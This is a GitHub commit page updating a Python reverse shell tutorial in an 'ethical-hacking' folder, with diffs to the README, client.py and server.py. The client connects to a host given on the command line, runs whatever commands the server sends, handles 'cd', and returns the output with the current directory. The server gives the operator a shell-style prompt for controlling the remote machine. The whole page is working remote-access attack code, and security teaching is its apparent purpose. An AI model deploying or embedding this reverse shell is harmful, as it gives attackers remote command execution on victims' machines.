Commit272e14b

committed

update reverse shell tutorial code

1 parent28e02a1 commit272e14bCopy full SHA for 272e14b

File tree

3 files changed

+41

-35

lines changed

ethical-hacking/reverse_shell

3 files changed

+41

-35

lines changed

`‎ethical-hacking/reverse_shell/README.md`

Lines changed: 1 addition & 19 deletions

Original file line number	Diff line number	Diff line change
`@@ -12,22 +12,4 @@ You don't need to install anything.`
`12`	`12`	```
`13`	`13`	`python client.py 192.168.1.104`
`14`	`14`	```
`15`		`- Output:`
`16`		- ```
`17`		`- Server: Hello and Welcome`
`18`		- ```
`19`		-- The server will get notified once a client is connected, executing `dir` command on Windows remotely (in `server.py`):
`20`		- ```
`21`		`- 192.168.1.103:58428 Connected!`
`22`		`- Enter the command you wanna execute:dir`
`23`		`- Volume in drive E is DATA`
`24`		`- Volume Serial Number is 644B-A12C`
`25`		`-`
`26`		`- Directory of E:\test`
`27`		`-`
`28`		`- 09/24/2019 02:15 PM <DIR> .`
`29`		`- 09/24/2019 02:15 PM <DIR> ..`
`30`		`- 0 File(s) 0 bytes`
`31`		`- 2 Dir(s) 89,655,123,968 bytes free`
`32`		`- Enter the command you wanna execute:exit`
`33`		- ```
	`15`	`+- The server will get notified once a client is connected.`

`‎ethical-hacking/reverse_shell/client.py`

Lines changed: 25 additions & 8 deletions

Original file line number	Diff line number	Diff line change
`@@ -1,29 +1,46 @@`
`1`	`1`	`importsocket`
	`2`	`+importos`
`2`	`3`	`importsubprocess`
`3`	`4`	`importsys`
`4`	`5`
`5`	`6`	`SERVER_HOST=sys.argv[1]`
`6`	`7`	`SERVER_PORT=5003`
`7`		`-BUFFER_SIZE=1024`
	`8`	`+BUFFER_SIZE=1024*128# 128KB max size of messages, feel free to increase`
	`9`	`+# separator string for sending 2 messages in one go`
	`10`	`+SEPARATOR="<sep>"`
`8`	`11`
`9`	`12`	`# create the socket object`
`10`	`13`	`s=socket.socket()`
`11`	`14`	`# connect to the server`
`12`	`15`	`s.connect((SERVER_HOST,SERVER_PORT))`
`13`		`-`
`14`		`-# receive the greeting message`
`15`		`-message=s.recv(BUFFER_SIZE).decode()`
`16`		`-print("Server:",message)`
	`16`	`+# get the current directory`
	`17`	`+cwd=os.getcwd()`
	`18`	`+s.send(cwd.encode())`
`17`	`19`
`18`	`20`	`whileTrue:`
`19`	`21`	`# receive the command from the server`
`20`	`22`	`command=s.recv(BUFFER_SIZE).decode()`
	`23`	`+splited_command=command.split()`
`21`	`24`	`ifcommand.lower()=="exit":`
`22`	`25`	`# if the command is exit, just break out of the loop`
`23`	`26`	`break`
`24`		`-# execute the command and retrieve the results`
`25`		`-output=subprocess.getoutput(command)`
	`27`	`+ifsplited_command[0].lower()=="cd":`
	`28`	`+# cd command, change directory`
	`29`	`+try:`
	`30`	`+os.chdir(' '.join(splited_command[1:]))`
	`31`	`+exceptFileNotFoundErrorase:`
	`32`	`+# if there is an error, set as the output`
	`33`	`+output=str(e)`
	`34`	`+else:`
	`35`	`+# if operation is successful, empty message`
	`36`	`+output=""`
	`37`	`+else:`
	`38`	`+# execute the command and retrieve the results`
	`39`	`+output=subprocess.getoutput(command)`
	`40`	`+# get the current working directory as output`
	`41`	`+cwd=os.getcwd()`
`26`	`42`	`# send the results back to the server`
`27`		`-s.send(output.encode())`
	`43`	`+message=f"{output}{SEPARATOR}{cwd}"`
	`44`	`+s.send(message.encode())`
`28`	`45`	`# close client connection`
`29`	`46`	`s.close()`

`‎ethical-hacking/reverse_shell/server.py`

Lines changed: 15 additions & 8 deletions

Original file line number	Diff line number	Diff line change
`@@ -2,8 +2,9 @@`
`2`	`2`
`3`	`3`	`SERVER_HOST="0.0.0.0"`
`4`	`4`	`SERVER_PORT=5003`
`5`		`-`
`6`		`-BUFFER_SIZE=1024`
	`5`	`+BUFFER_SIZE=1024*128# 128KB max size of messages, feel free to increase`
	`6`	`+# separator string for sending 2 messages in one go`
	`7`	`+SEPARATOR="<sep>"`
`7`	`8`
`8`	`9`	`# create a socket object`
`9`	`10`	`s=socket.socket()`
`@@ -20,21 +21,27 @@`
`20`	`21`	`client_socket,client_address=s.accept()`
`21`	`22`	`print(f"{client_address[0]}:{client_address[1]} Connected!")`
`22`	`23`
`23`		`-#just sending a message, for demonstration purposes`
`24`		`-message="Hello and Welcome".encode()`
`25`		`-client_socket.send(message)`
	`24`	`+#receiving the current working directory of the client`
	`25`	`+cwd=client_socket.recv(BUFFER_SIZE).decode()`
	`26`	`+print("[+] Current working directory:",cwd)`
`26`	`27`
`27`	`28`	`whileTrue:`
`28`	`29`	`# get the command from prompt`
`29`		`-command=input("Enter the command you wanna execute:")`
	`30`	`+command=input(f"{cwd} $> ")`
	`31`	`+ifnotcommand.strip():`
	`32`	`+# empty command`
	`33`	`+continue`
`30`	`34`	`# send the command to the client`
`31`	`35`	`client_socket.send(command.encode())`
`32`	`36`	`ifcommand.lower()=="exit":`
`33`	`37`	`# if the command is exit, just break out of the loop`
`34`	`38`	`break`
`35`	`39`	`# retrieve command results`
`36`		`-results=client_socket.recv(BUFFER_SIZE).decode()`
`37`		`-# print them`
	`40`	`+output=client_socket.recv(BUFFER_SIZE).decode()`
	`41`	`+print("output:",output)`
	`42`	`+# split command output and current directory`
	`43`	`+results,cwd=output.split(SEPARATOR)`
	`44`	`+# print output`
`38`	`45`	`print(results)`
`39`	`46`	`# close connection to the client`
`40`	`47`	`client_socket.close()`

0 commit comments

Comments

(0)

Movatterモバイル変換

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit272e14b

File tree

3 files changed

3 files changed

`‎ethical-hacking/reverse_shell/README.md`

`‎ethical-hacking/reverse_shell/client.py`

`‎ethical-hacking/reverse_shell/server.py`

0 commit comments